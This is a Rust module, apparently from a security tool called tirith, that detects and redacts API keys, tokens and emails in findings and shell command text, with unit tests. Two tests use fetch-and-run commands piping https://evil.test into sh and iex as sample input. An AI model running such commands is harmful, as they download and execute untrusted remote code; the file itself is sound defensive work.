1use once_cell::sync::Lazy;
2use regex::Regex;
3
4struct CredRedactEntry {
7 regex: Regex,
8 prefix_len: usize,
9}
10
11static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13 #[derive(serde::Deserialize)]
14 struct CredFile {
15 pattern: Option<Vec<CredPat>>,
16 private_key_pattern: Option<Vec<PkPat>>,
17 }
18 #[derive(serde::Deserialize)]
19 struct CredPat {
20 regex: String,
21 redact_prefix_len: Option<usize>,
22 }
23 #[derive(serde::Deserialize)]
24 struct PkPat {
25 #[allow(dead_code)]
26 regex: String,
27 redact_regex: Option<String>,
28 }
29
30 let toml_str = include_str!("../assets/data/credential_patterns.toml");
31 let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33 let mut entries = Vec::new();
34 if let Some(patterns) = cred_file.pattern {
35 for p in patterns {
36 if let Ok(re) = Regex::new(&p.regex) {
37 entries.push(CredRedactEntry {
38 regex: re,
39 prefix_len: p.redact_prefix_len.unwrap_or(4),
40 });
41 }
42 }
43 }
44 if let Some(pk_patterns) = cred_file.private_key_pattern {
45 for pk in pk_patterns {
46 let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
49 if let Ok(re) = Regex::new(redact_pattern) {
50 entries.push(CredRedactEntry {
51 regex: re,
52 prefix_len: 0,
53 });
54 }
55 }
56 }
57 entries
58});
59
60static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
62 vec![
63 (
64 "OpenAI API Key",
65 Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
66 ),
67 ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
68 ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
69 (
70 "GitHub Server Token",
71 Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
72 ),
73 (
74 "Anthropic API Key",
75 Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
76 ),
77 (
78 "Slack Token",
79 Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
80 ),
81 (
82 "Email Address",
83 Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
84 ),
85 ]
86});
87
88pub fn redact(input: &str) -> String {
90 let mut result = input.to_string();
91 for (label, regex) in BUILTIN_PATTERNS.iter() {
93 result = regex
94 .replace_all(&result, format!("[REDACTED:{label}]"))
95 .into_owned();
96 }
97 for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
99 result = entry
100 .regex
101 .replace_all(&result, |caps: ®ex::Captures| {
102 let matched = &caps[0];
103 let prefix: String = matched.chars().take(entry.prefix_len).collect();
104 format!("{prefix}[REDACTED]")
105 })
106 .into_owned();
107 }
108 result
109}
110
111pub struct CompiledCustomPatterns {
113 patterns: Vec<Regex>,
114}
115
116impl CompiledCustomPatterns {
117 pub fn new(raw_patterns: &[String]) -> Self {
119 let patterns = raw_patterns
120 .iter()
121 .filter_map(|pat_str| match Regex::new(pat_str) {
122 Ok(re) => Some(re),
123 Err(e) => {
124 eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
125 None
126 }
127 })
128 .collect();
129 Self { patterns }
130 }
131}
132
133pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
135 let mut result = redact(input);
136 for pat_str in custom_patterns {
137 if pat_str.len() > 1024 {
138 eprintln!(
139 "tirith: DLP pattern too long ({} chars), skipping",
140 pat_str.len()
141 );
142 continue;
143 }
144 match Regex::new(pat_str) {
145 Ok(re) => {
146 result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
147 }
148 Err(e) => {
149 eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
150 }
151 }
152 }
153 result
154}
155
156pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
158 let mut result = redact(input);
159 for re in &compiled.patterns {
160 result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
161 }
162 result
163}
164
165pub fn redact_shell_assignments(input: &str) -> String {
168 let chars: Vec<char> = input.chars().collect();
169 let mut out = String::with_capacity(input.len());
170 let mut i = 0;
171
172 while i < chars.len() {
173 if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
174 out.push_str(&prefix);
175 out.push_str("[REDACTED]");
176 i = next;
177 continue;
178 }
179
180 if is_assignment_start(&chars, i) {
181 let name_start = i;
182 i += 1;
183 while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
184 i += 1;
185 }
186 if i < chars.len() && chars[i] == '=' {
187 let name: String = chars[name_start..i].iter().collect();
188 out.push_str(&name);
189 out.push_str("=[REDACTED]");
190 i += 1;
191 i = skip_assignment_value(&chars, i);
192 continue;
193 }
194 out.push(chars[name_start]);
195 i = name_start + 1;
196 continue;
197 }
198
199 out.push(chars[i]);
200 i += 1;
201 }
202
203 out
204}
205
206pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
209 let scrubbed = redact_shell_assignments(input);
210 redact_with_custom(&scrubbed, custom_patterns)
211}
212
213pub fn redacted_findings(
215 findings: &[crate::verdict::Finding],
216 custom_patterns: &[String],
217) -> Vec<crate::verdict::Finding> {
218 let mut redacted = findings.to_vec();
219 redact_findings(&mut redacted, custom_patterns);
220 redacted
221}
222
223pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
225 finding.title = redact_with_custom(&finding.title, custom_patterns);
226 finding.description = redact_with_custom(&finding.description, custom_patterns);
227 if let Some(ref mut v) = finding.human_view {
228 *v = redact_with_custom(v, custom_patterns);
229 }
230 if let Some(ref mut v) = finding.agent_view {
231 *v = redact_with_custom(v, custom_patterns);
232 }
233 for ev in &mut finding.evidence {
234 redact_evidence(ev, custom_patterns);
235 }
236}
237
238fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
239 use crate::verdict::Evidence;
240 match ev {
241 Evidence::Url { raw } => {
242 *raw = redact_with_custom(raw, custom_patterns);
243 }
244 Evidence::CommandPattern { matched, .. } => {
245 *matched = redact_command_text(matched, custom_patterns);
246 }
247 Evidence::EnvVar { value_preview, .. } => {
248 *value_preview = redact_with_custom(value_preview, custom_patterns);
249 }
250 Evidence::Text { detail } => {
251 *detail = redact_command_text(detail, custom_patterns);
252 }
253 Evidence::ByteSequence { description, .. } => {
254 *description = redact_with_custom(description, custom_patterns);
255 }
256 _ => {}
259 }
260}
261
262pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
264 for f in &mut verdict.findings {
265 redact_finding(f, custom_patterns);
266 }
267}
268
269pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
271 for f in findings.iter_mut() {
272 redact_finding(f, custom_patterns);
273 }
274}
275
276fn is_assignment_boundary(prev: char) -> bool {
277 prev.is_ascii_whitespace() || matches!(prev, ';' | '|' | '&' | '(' | '\n')
278}
279
280fn is_assignment_start(chars: &[char], idx: usize) -> bool {
281 let ch = chars[idx];
282 if !(ch.is_ascii_alphabetic() || ch == '_') {
283 return false;
284 }
285 if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
286 return false;
287 }
288 true
289}
290
291fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
292 let mut in_single = false;
293 let mut in_double = false;
294 let mut escaped = false;
295
296 while idx < chars.len() {
297 let ch = chars[idx];
298 if escaped {
299 escaped = false;
300 idx += 1;
301 continue;
302 }
303 if !in_single && ch == '\\' {
304 escaped = true;
305 idx += 1;
306 continue;
307 }
308 if !in_double && ch == '\'' {
309 in_single = !in_single;
310 idx += 1;
311 continue;
312 }
313 if !in_single && ch == '"' {
314 in_double = !in_double;
315 idx += 1;
316 continue;
317 }
318 if !in_single
319 && !in_double
320 && (ch.is_ascii_whitespace() || matches!(ch, ';' | '|' | '&' | '\n'))
321 {
322 break;
323 }
324 idx += 1;
325 }
326
327 idx
328}
329
330fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
331 if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
332 return None;
333 }
334 if chars.get(idx) != Some(&'$') {
335 return None;
336 }
337 let prefix = ['e', 'n', 'v', ':'];
338 for (offset, expected) in prefix.iter().enumerate() {
339 let ch = chars.get(idx + 1 + offset)?;
340 if !ch.eq_ignore_ascii_case(expected) {
341 return None;
342 }
343 }
344
345 let name_start = idx + 5;
346 let first = *chars.get(name_start)?;
347 if !(first.is_ascii_alphabetic() || first == '_') {
348 return None;
349 }
350
351 let mut i = name_start + 1;
352 while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
353 i += 1;
354 }
355 let mut value_start = i;
356 while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
357 value_start += 1;
358 }
359 if chars.get(value_start) != Some(&'=') {
360 return None;
361 }
362 value_start += 1;
363 while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
364 value_start += 1;
365 }
366
367 let prefix_text: String = chars[idx..value_start].iter().collect();
368 let value_end = skip_assignment_value(chars, value_start);
369 Some((prefix_text, value_end))
370}
371
372#[cfg(test)]
373mod tests {
374 use super::*;
375
376 #[test]
377 fn test_redact_openai_key() {
378 let key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
379 let input = format!("export OPENAI_API_KEY={key}");
380 let redacted = redact(&input);
381 assert!(!redacted.contains("sk-abcdef"));
382 assert!(redacted.contains("[REDACTED:OpenAI API Key]"));
383 }
384
385 #[test]
386 fn test_redact_aws_key() {
387 let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
388 let redacted = redact(input);
389 assert!(!redacted.contains("AKIAIOSFODNN7EXAMPLE"));
390 assert!(redacted.contains("[REDACTED:AWS Access Key]"));
391 }
392
393 #[test]
394 fn test_redact_github_pat() {
395 let pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
396 let input = format!("GITHUB_TOKEN={pat}");
397 let redacted = redact(&input);
398 assert!(!redacted.contains("ghp_ABCDEF"));
399 assert!(redacted.contains("[REDACTED:GitHub PAT]"));
400 }
401
402 #[test]
403 fn test_redact_email() {
404 let input = "contact: user@example.com for details";
405 let redacted = redact(input);
406 assert!(!redacted.contains("user@example.com"));
407 assert!(redacted.contains("[REDACTED:Email Address]"));
408 }
409
410 #[test]
411 fn test_redact_no_false_positive() {
412 let input = "normal text without any secrets";
413 let redacted = redact(input);
414 assert_eq!(input, redacted);
415 }
416
417 #[test]
418 fn test_redact_with_custom() {
419 let input = "internal ref: PROJ-12345 in the system";
420 let custom = vec![r"PROJ-\d+".to_string()];
421 let redacted = redact_with_custom(input, &custom);
422 assert!(!redacted.contains("PROJ-12345"));
423 assert!(redacted.contains("[REDACTED:custom]"));
424 }
425
426 #[test]
427 fn test_redact_anthropic_key() {
428 let key = concat!("sk-ant-api03-", "abcdefghijklmnop");
429 let input = format!("ANTHROPIC_API_KEY={key}");
430 let redacted = redact(&input);
431 assert!(!redacted.contains("sk-ant-api03"));
432 assert!(redacted.contains("[REDACTED:Anthropic API Key]"));
433 }
434
435 #[test]
436 fn test_redact_finding_covers_all_fields() {
437 use crate::verdict::{Evidence, Finding, RuleId, Severity};
438 let openai_key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
439 let github_pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
440 let aws_key = "AKIAIOSFODNN7EXAMPLE";
441
442 let mut finding = Finding {
443 rule_id: RuleId::SensitiveEnvExport,
444 severity: Severity::High,
445 title: "test".into(),
446 description: format!("exports {openai_key}"),
447 evidence: vec![
448 Evidence::EnvVar {
449 name: "OPENAI_API_KEY".into(),
450 value_preview: openai_key.into(),
451 },
452 Evidence::Text {
453 detail: format!("saw {github_pat}"),
454 },
455 Evidence::CommandPattern {
456 pattern: "export".into(),
457 matched: format!("export OPENAI_API_KEY={openai_key}"),
458 },
459 ],
460 human_view: Some(format!("key is {openai_key}")),
461 agent_view: Some(format!("{aws_key} exposed")),
462 mitre_id: None,
463 custom_rule_id: None,
464 };
465
466 redact_finding(&mut finding, &[]);
467
468 assert!(finding.description.contains("[REDACTED:OpenAI API Key]"));
469 assert!(!finding.description.contains("sk-abcdef"));
470
471 match &finding.evidence[0] {
472 Evidence::EnvVar { value_preview, .. } => {
473 assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
474 }
475 _ => panic!("expected EnvVar"),
476 }
477 match &finding.evidence[1] {
478 Evidence::Text { detail } => {
479 assert!(detail.contains("[REDACTED:GitHub PAT]"));
480 }
481 _ => panic!("expected Text"),
482 }
483 match &finding.evidence[2] {
484 Evidence::CommandPattern { matched, .. } => {
485 assert!(matched.contains("OPENAI_API_KEY=[REDACTED]"));
486 assert!(!matched.contains("sk-abcdef"));
487 }
488 _ => panic!("expected CommandPattern"),
489 }
490
491 assert!(finding
492 .human_view
493 .as_ref()
494 .unwrap()
495 .contains("[REDACTED:OpenAI API Key]"));
496 assert!(finding
497 .agent_view
498 .as_ref()
499 .unwrap()
500 .contains("[REDACTED:AWS Access Key]"));
501 }
502
503 #[test]
504 fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
505 let redacted =
506 redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
507 assert!(redacted.contains("OPENAI_API_KEY=[REDACTED]"));
508 assert!(!redacted.contains("sk-secret"));
509 }
510
511 #[test]
512 fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
513 let redacted = redact_shell_assignments(
514 "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
515 );
516 assert!(redacted.contains("$env:OPENAI_API_KEY = [REDACTED]"));
517 assert!(!redacted.contains("sk-secret"));
518 }
519}